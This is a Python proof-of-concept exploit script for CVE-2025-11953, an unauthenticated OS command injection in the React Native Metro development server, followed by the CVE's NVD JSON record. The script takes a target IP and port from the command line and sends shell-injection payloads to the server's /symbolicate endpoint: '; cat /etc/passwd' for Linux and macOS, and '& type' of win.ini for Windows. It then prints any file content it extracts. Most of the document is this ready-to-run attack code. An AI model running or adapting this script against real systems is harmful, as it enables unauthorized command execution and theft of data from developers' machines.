CVE-2025-11953

import requests import sys # CVE-2025-11953 PoC - Metro Development Server Command Injection # Target: React Native Community CLI Metro Server # Severity: Critical (CVSS 9.8) def exploit_metro_server(target_ip, target_port=8081): """ Exploit for CVE-2025-11953: Metro Development Server Command Injection This PoC demonstrates how an unauthenticated attacker can execute arbitrary commands on systems running Metro dev server exposed to network. WARNING: For authorized security testing only! """ # Check if server is reachable base_url = f"http://{target_ip}:{target_port}" try: response = requests.get(base_url, timeout=5) print(f"[*] Metro server is reachable at {base_url}") except requests.exceptions.RequestException as e: print(f"[!] Cannot reach Metro server: {e}") return False # Command injection payload for Linux/macOS linux_payload = "; cat /etc/passwd" # Command injection payload for Windows windows_payload = "& type C:\\Windows\\win.ini" # Try Linux payload print(f"[*] Sending command injection payload...") try: response = requests.post( f"{base_url}/symbolicate", json={"stack": [{"file": linux_payload}]}, timeout=10 ) print(f"[*] Response status: {response.status_code}") if "root:" in response.text or "daemon:" in response.text: print("[+] VULNERABLE! Command injection successful!") print(f"[*] Extracted /etc/passwd content:") print(response.text[:500]) return True except Exception as e: print(f"[!] Error: {e}") # Try Windows payload try: response = requests.post( f"{base_url}/symbolicate", json={"stack": [{"file": windows_payload}]}, timeout=10 ) if "for 16-bit app support" in response.text.lower(): print("[+] VULNERABLE! Windows command injection successful!") return True except: pass print("[-] Target may not be vulnerable or different endpoint required") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-11953-poc.py <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 8081 exploit_metro_server(target, port)

{"cve": {"id": "CVE-2025-11953", "sourceIdentifier": "[email protected]", "published": "2025-11-03T17:15:32.677", "lastModified": "2026-02-06T19:43:47.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection. This allows unauthenticated network attackers to send a POST request to the server and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "cisaExploitAdd": "2026-02-05", "cisaActionDue": "2026-02-26", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "React Native Community CLI OS Command Injection Vulnerability", "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.0.0", "versionEndExcluding": "19.1.2", "matchCriteriaId": "99E1FC34-6FDB-45F5-841F-F96C5012DC5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:18.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "2C0FCA50-3DE2-4CD3-87AB-EA793072E856"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha0:*:*:*:*:*:*", "matchCriteriaId": "681E0D24-769A-4A3C-B19A-B260114B7291"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "D3BBB26F-FAB1-49BB-A7EE-E9FDF0797B01"}, {"vulnerable": true, "criteria": "cpe:2.3:a:react-native-community:react_native_community_cli:20.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "84D809F4-D4FF-44F4-857F-294D208F5C9E"}]}]}], "references": [{"url": "https://github.com/react-native-community/cli/commit/15089907d1f1301b22c72d7f68846a2ef20df547", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://jfrog.com/blog/cve-2025-11953-critical-react-native-community-cli-vulnerability", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://x.com/SzymonRybczak/status/1986199665000566848", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://x.com/thymikee/status/1986770875954475375", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11953", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}, {"url": "https://www.vulncheck.com/blog/metro4shell_eitw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}